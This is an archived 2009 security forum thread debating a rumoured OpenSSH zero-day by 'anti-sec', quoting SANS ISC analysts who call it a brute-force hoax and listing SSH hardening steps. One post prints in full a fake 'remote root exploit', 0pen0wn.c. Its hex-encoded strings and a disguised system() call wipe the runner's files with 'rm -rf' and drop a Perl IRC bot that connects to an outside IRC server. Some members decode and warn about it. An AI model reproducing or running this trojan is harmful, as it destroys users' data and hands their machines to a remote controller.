.

openssh 0day rumors

<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Tue Jul 07, 2009 8:03 pm

openssh 0day rumors

http://www.securityaegis.com/?p=445

I did a little recon on the rumors at the ISC:

Rumors are flying of an underground openssh exploit. After some digging we find the tool name and its group:

“./0pen0wn” by the hacker group called “anti-sec.”

Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista Admin:

http://romeo.copyandpaste.info/txt/nowayout.txt

The second attack is the one the Internet Storm Center blogged on which can be seen in its entirety here:

http://tinyurl.com/l8tzba

and a Russian site has a play by play of the attack here:

http://tinyurl.com/m7cqdh

A Belgian Blog has this to say about it:

    There have been a splash of openssh attacks and scanning – even in Belgium – and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center but it is not all clear yet. The rumor is that a Zero day has been discovered for OLDER versions of Open SSH. This means there is no patch – but you can upgrade which will solve the issue.

    I know it is a lot of work but it is work that you have to do otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.

    Do the right think. Upgrade to the latest versions

    ps what is strange about the openSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by chosing another port not to be found while scanning). Means they are smart these guys.

    Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this blackhat conference will become a hell of a show…

<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Tue Jul 07, 2009 9:57 pm

Re: openssh 0day rumors

Update:

ISC has a thrid update saying this:

    We’ve received a few emails that lend credibility to the rumor, and we’ve received a few more that paint an interesting picture – that the reports are all part of a cover-up to hide another breach that was caused by a sysadmin’s mistake.  What we are lacking is the actual exploit code.  So if this is “for real” would somebody slip us a copy and leave it under the door mat?  (Actually, our contactform is the best place.)  We won’t tell anybody where it came from but it sure would put a lid on this story.


If you look at the attack log the ./0pen0wn script drops them into a jailshell which they have to escape to get get at box. This might have some insight on the exploit? They use ./MichaelScofield script (pun because hes a character in the tv series prison break) to get  /bin/sh and go after passwords, etc.

sh-3.1$ ./MichaelScofield

[+] MichaelScofield - Prison Breaker / anti-sec group
[+] Grabbing environment variables...

SHELL=/usr/local/cpanel/bin/jailshell

[+] Injecting new shell..

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

SHELL=/bin/sh
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sat Jul 11, 2009 4:28 pm

Re: openssh 0day rumors

All you probably know by now, but it was a hoax.
twitter.com/timmedin | http://blog.securitywhole.com
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Sat Jul 11, 2009 7:35 pm

Re: openssh 0day rumors

Well the director of the ISC said that the vuln had merit, then Bojan an ISC handler and pentester said the below quotes.

I don't wanna spread FUD but  I'd suggest following these steps given by ISC readers:

-make sure SSH is updated

-lock down SSH on the hardware firewall level to come only from authorized IP addresses

-hosts.deny or iptables active response.

-use a port-knocking system especially on the SSH service

-Portsentry listens on port 22, while openSSH-server has another port. ban port 22 connections via portsentry and iptables


it may just be a new type of bruteforce, it may be something else, best be prepared anyways =)

For the last couple of days we've been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.

At this moment, it definitely looks like we're dealing with a hoax – even more, it's not the first time someone said they have a 0-day exploit for SSH. So, let's see some facts about this.

It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.

The "exploit" used in that file is a brute force attack for sure, as can be seen below:

anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt

See the "-l" option? That supplies the list of users it will try to brute force.
Additionally, a bit below it even prints which user was hacked:

      [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

      user: crownvip
      uname: Linux srv01.webhostline.com
2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux

Now, what has been posted on the Full-Disclosure list (the supposed
exploit) looked like this:

anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22

Same group, same server, same directory – different file name. Why didn't they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn't the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable.

Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.

So, I'd like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.

--
Bojan


No one has been verified wrong or right yet.

Bojan gave an interview here:


Security researchers have warned that a reported flaw in OpenSSH (Secure Shell) is a probable hoax.

Earlier this week, SANS received an anonymous email claiming of a zero-day vulnerability in OpenSSH, which means a flaw in the software is already being exploited as it becomes public. OpenSSH (Secure Shell), is used by administrators to make encrypted connections with other computers and do tasks such as remotely updating files. OpenSSH is the open-source version, and there are commercial versions of the program.

A true zero-day vulnerability in OpenSSH could be devastating for the Internet, allowing hackers to have carte blanche access to servers and PCs until a workaround or a patch is readied.

"That's why I think people are actually creating quite a bit of a panic," said Bojan Zdrnja, a SANS analyst and senior information security consultant at Infigo, a security and penetration testing company in Zagreb, Croatia. "People should not panic right now. Nothing at this time points that there is an exploit being used in the wild."

The evidence of a true zero-day vulnerability in OpenSSH is weak, Zdrnja said. So far, analysts haven't seen a working exploit, despite worries that a group called Anti-Sec may have found a zero-day that allowed them to control a web server. Details on the hack were posted on Full Disclosure, which is an unmoderated forum for security information.

When pressed for more details, a person claiming to be part of Anti-Sec wrote an e-mail to the IDG news service saying "I'm not allowed to actually discuss the exploit (or whether or not it exists)," which was signed "Anonymous."

Zdrnja said the same group compromised another server recently, but it appeared to be a brute-force attack against OpenSSH. A brute-force attack is where a hacker tries many combinations of authentication credentials in order to get access to a server. If an administrator is using is using simple log-ins and passwords, it makes a server more vulnerable to a brute-force attack, Zdrnja said.

Both of the compromised servers were run by the same person. "I suppose what we are dealing with here are two hackers in a war between themselves," Zdrnja said.

But there are other factors that indicate a zero-day for OpenSSH doesn't exist. If the zero-day existed, hackers would probably be more likely to use it against a more high-profile server than the most recent one that was compromised, Zdrnja said.

One of OpenSSH's developers, Damien Miller, also threw cold water on the possibility of a zero-day. Miller wrote on an OpenSSH forum that he had exchanged mails with an alleged victim of the zero-day, but the attacks appeared to be "simple brute-force."

"So, I'm not persuaded that a zero-day exists at all," Miller wrote. "The only evidence so far are some anonymous rumors and unverifiable intrusion transcripts."

There also seems to be some confusion between the alleged zero-day and a different vulnerability in OpenSSH, Zdrnja said. That vulnerability, which is as of yet unpatched, could allow an attacker to recover up to 32 bits of plain text from an arbitrary block of ciphertext from a connection secured using the SSH protocol in the standard configuration, according to an advisory from the UK's Center for the Protection of National Infrastructure (CPNI).

The severity of the vulnerability is considered high, but the chance of successful exploitation is low, according to CPNI. Zdrnja said administrators can implement stronger authentication mechanisms in OpenSSH using public and private keys to guard against a successful attack. In an advisory, OpenSSH also stated that the possibility of a successful attack was low.
Last edited by Jhaddix on Sat Jul 11, 2009 7:51 pm, edited 1 time in total.
<<

Vedder

Newbie
Newbie

Posts: 26

Joined: Sun Feb 15, 2009 5:18 am

Post Mon Jul 13, 2009 3:59 am

Re: openssh 0day rumors

timmedin wrote:All you probably know by now, but it was a hoax.


They have hit Imageshack over the weekend, looks like its another ssh exploit.

I thought it was a hoax at first as well, now I am not so sure.
C|EH, MCSE, MCSA: Security, Security+, Network+, A+
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Jul 13, 2009 7:13 am

Re: openssh 0day rumors

I saw that it was Anti-Sec that hit Imageshack, but I couldn't find how they did it.  Where did you see that it was an SSH exploit?  Can you please post a link?
~~~~~~~~~~~~~~
Ketchup
<<

alan

User avatar

Newbie
Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Mon Jul 13, 2009 5:42 pm

Re: openssh 0day rumors

only thing i saw was http://romeo.copyandpaste.info/txt/imageshack-pwned.txt

nothing to suggest ssh?
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Jul 13, 2009 9:57 pm

Re: openssh 0day rumors

Thanks.  I saw the same elsewhere too.  There really isn't much in terms of detail there, but it does reference OpenSSH, so who knows. 
~~~~~~~~~~~~~~
Ketchup
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Tue Jul 14, 2009 12:18 pm

Re: openssh 0day rumors

captured during the netwars SANS CTF

  Code:
/* 0pen0wn.c by anti-sec group
 * ---------------------------
 * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
 *
 *
 * Takes advantage of an off-by-one
 * bug in mapped authentication space on system
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b

char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";

char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a";


char fbsd_shellcode[] =
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
        "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
        "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
#define SIZE 0xffffff      
#define OFFSET 131
#define fremote build_frem(t,e,s,m,y)

void usage(char *arg){
        printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n");
        printf("  Usage: %s -h <host> -p port\n",arg);
        printf("  Options:\n");
        printf("  \t-h ip/host of target\n");
        printf("  \t-p port\n");
        printf("  \t-d username\n");
        printf("  \t-B memory_limit 8/16/64\n\n\n");
}

#define FD 0x080518fc
#define BD 0x08082000

int main(int argc, char **argv){
    FILE *jmpinst;
    char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
    int port=23, limit=8, target=0, sock;
    struct hostent *host;
    struct sockaddr_in addr;

    if (geteuid()) {
    puts("need root for raw socket, etc...");
    return 1;
    }

    if(argc < 3){
        usage(argv[0]);
        return 1;
    }

  
    printf("\n  [+] 0wn0wn - by anti-sec group\n");
   
       if (!inet_aton(h, &addr.sin_addr)){
        host = gethostbyname(h);
        if (!host){
            printf("  [-] Resolving failed\n");
            return 1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }
   
    sock = socket(PF_INET, SOCK_STREAM, 0);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
        printf("  [-] Connecting failed\n");
        return 1;
    }
    payload = malloc(limit * 10000);
    ptr = payload+8;
    memcpy(ptr,jmpcode,strlen(jmpcode));
    jmpinst=fopen(shellcode+793,"w+");
    if(jmpinst){
        fseek(jmpinst,0,SEEK_SET);
        fprintf(jmpinst,"%s",shellcode);
        fclose(jmpinst);
    }
    ptr += strlen(jmpcode);
    if(target != 5 && target != 6){
        memcpy(ptr,shellcode,strlen(shellcode));
        ptr += strlen(shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
    }
    else{
        memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
        ptr += strlen(fbsd_shellcode);
        memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
    }
    send(sock,buffer,strlen(buffer),0);
    send(sock,ptr,3750,0);
    close(sock);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
        printf("  [-] connecting failed\n");             
    }

    payload[sizeof(payload)-1] = '\0';
    payload[sizeof(payload)-2] = '\0';
    send(sock,buffer,strlen(buffer),0);
    send(sock,payload,strlen(payload),0);
    close(sock);
    free(payload);
    addr.sin_port = htons(6666);
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                   /* v--- our cool bar that says: "r0000000t!!!" */
        printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
        fremote("PS1='sh-3.2#' /bin/sh");
    }
    else
        printf("  [-] failed to exploit target :-(\n");
    close(sock);
    return 0;
}
<<

lincoln

Newbie
Newbie

Posts: 13

Joined: Tue Jun 23, 2009 11:38 am

Post Tue Jul 14, 2009 1:03 pm

Re: openssh 0day rumors

Have you tried that code? I wouldn't recommend it, only test on a virtual box you wouldn't mind losing
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Tue Jul 14, 2009 1:21 pm

Re: openssh 0day rumors

LOL, I second that.  The jmpcode[] converts to:

rm -rf ~ /* 2> /dev/null &
~~~~~~~~~~~~~~
Ketchup
<<

timmedin

User avatar

Sr. Member
Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Tue Jul 14, 2009 8:38 pm

Re: openssh 0day rumors

Ketchup wrote:LOL, I second that.   The jmpcode[] converts to:

rm -rf ~ /* 2> /dev/null &


...if we then jump into null and retrieve all files as we ride a unicorn over to the rainbow...
twitter.com/timmedin | http://blog.securitywhole.com
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Wed Jul 15, 2009 1:08 am

Re: openssh 0day rumors

I have only looked through the posted source code quickly but it doesn't seems to be an "openssh 0day exploit".
<<

Vedder

Newbie
Newbie

Posts: 26

Joined: Sun Feb 15, 2009 5:18 am

Post Wed Jul 15, 2009 6:30 am

Re: openssh 0day rumors

Ketchup wrote:LOL, I second that.  The jmpcode[] converts to:

rm -rf ~ /* 2> /dev/null &




Noobish question here - how do you convert that?

/off to read up on shellcoding...

*edit*

Hex -> ASCII!

Google works wonders ;)
Last edited by Vedder on Wed Jul 15, 2009 6:36 am, edited 1 time in total.
C|EH, MCSE, MCSA: Security, Security+, Network+, A+
<<

Vedder

Newbie
Newbie

Posts: 26

Joined: Sun Feb 15, 2009 5:18 am

Post Wed Jul 15, 2009 7:07 am

Re: openssh 0day rumors

I have just been converting the shellcode and all it seems to do is try and connect to an IRC channel.

Am I missing something about the exploits "usefulness"?

I will compile and test this on a virtual box at home later, it'll be interesting, more as my first steps into understanding shellcode/exploits more than anything!
C|EH, MCSE, MCSA: Security, Security+, Network+, A+
Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software